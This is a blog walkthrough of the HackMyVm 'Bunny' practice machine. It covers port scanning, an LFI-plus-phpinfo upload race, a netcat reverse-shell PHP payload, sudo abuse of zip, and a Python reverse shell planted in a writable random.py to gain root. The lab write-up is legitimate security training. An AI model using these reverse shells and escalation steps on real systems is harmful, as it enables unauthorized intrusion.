Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Bunny Walkthrough

HackMyVm Bunny Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bunny


Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                      
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Scan dirs.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,4
 03,404,500 --wildcard   -o 80.log
 ===============================================================
 /upload.php           (Status: 200) [Size: 27305]
 /password.txt         (Status: 200) [Size: 537]
 /index.php            (Status: 200) [Size: 25]
 /config.php           (Status: 200) [Size: 24691]
 /phpinfo.php          (Status: 200) [Size: 95622]


After checking all files, nothing interesting. Next fuzz if index.php get some params.

 ~ wfuzz -u 'http://192.168.56.100/index.php?FUZZ=/etc/passwd' --hh 25  -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000013357:   200        31 L     43 W       1508 Ch     "page"


Fuzz local files, but found nothing useful.

 ~ wfuzz -u 'http://192.168.56.100/index.php?page=FUZZ'  --hh 25  -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt                  
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000001:   200        31 L     43 W       1508 Ch     "/etc/passwd"
 000000005:   200        231 L    1117 W     7249 Ch     "/etc/apache2/apache2.conf"
 000000004:   200        17 L     42 W       426 Ch      "/etc/anacrontab"
 000000015:   200        26 L     192 W      1067 Ch     "/etc/crontab"
 ...


Now we get an php file with LFI, and phpinfo file whose file_uploads is on. It's a famous vulnerability.

Download poc from https://raw.githubusercontent.com/vulhub/vulhub/master/php/inclusion/exp.py and modify payload code.

      PAYLOAD="""%s\r$                                                                                                                                    
     9 <?php file_put_contents('/tmp/g', '<?php system("nc 192.168.56.150 1234 -e /bin/bash"); ?>')?>\r""" % TAG$


Run poc, now shell has been uploaded to /tmp/g.

 ~ (p2) python exp.py 192.168.56.100 80                                                                                                    vim-0 | 0 [13:38:55]
 LFI With PHPInfo()
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Getting initial offset... found [tmp_name] at 137073
 Spawning worker pool (10)...
   51 /  1000
 Got it! Shell created in /tmp/g
 
 Woot!  \m/
 Shuttin' down...


Listen to port 1234 and runs the /tmp/g through LFI.

 ~ curl 'http://192.168.56.100/index.php?page=/tmp/g'                                                     
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234        
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49970.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)


Next, we found user chris and a file named magic.

 www-data@bunny:/home/chris/lab$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on bunny:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User www-data may run the following commands on bunny:
     (chris) NOPASSWD: /bin/bash /home/chris/lab/magic *
 www-data@bunny:/home/chris/lab$ cat magic
 cat magic
 #/bin/bash
 $1 $2 $3 -T -TT 'sh #'
 www-data@bunny:/home/chris/lab$


Check online notes from https://gtfobins.github.io/gtfobins/zip/, we see zip can spawn a shell use the cmd in magic file.

 Shell
 
 It can be used to break out from restricted environments by spawning an interactive system shell.
 
     TF=$(mktemp -u)
     zip $TF /etc/hosts -T -TT 'sh #'
     rm $TF


Escalate to user chris.

 www-data@bunny:/home/chris/lab$ sudo -u chris /bin/bash /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
 <h /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
   adding: etc/hosts (deflated 30%)
 $ id
 id
 uid=1000(chris) gid=1000(chris) groups=1000(chris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)


Create /home/chris/.ssh, upload id_rsa.pub, rename to authorized_keys, chmod 600, then we can get ssh login.

Found writable file.

 chris@bunny:~$ find / -writable -not -path "/proc*" 2>/dev/null
 /home/chris
 ...
 /usr/lib/python3.7/random.py
 /tmp
 ...


Found /opt/pendu.py which imports random.py.

 chris@bunny:~$ cd /opt
 chris@bunny:/opt$ ls -la
 total 12
 drwxr-x---  2 root chris 4096 juil. 31 10:25 .
 drwxr-xr-x 18 root root  4096 juil. 31 09:00 ..
 -rw-r--r--  1 root root  1993 juil. 31 10:14 pendu.py
 chris@bunny:/opt$ cat pendu.py
 import random                    
 ...


Use pspy to check system calls.

 2021/08/17 06:53:01 CMD: UID=0    PID=1236   | /bin/sh -c /usr/bin/python3.7 /opt/pendu.py


Write python reverse shell code into random.py, and wait for the final root shell.

 chris@bunny:~$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.150",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /usr/lib/python3.7/random.py 
 chris@bunny:~$
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49976.
 bash: impossible de régler le groupe de processus du terminal (1259): Ioctl() inapproprié pour un périphérique
 bash: pas de contrôle de tâche dans ce shell
 root@bunny:~# id;hostname;
 id;hostname;
 uid=0(root) gid=0(root) groupes=0(root)
 bunny
 root@bunny:~#

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.1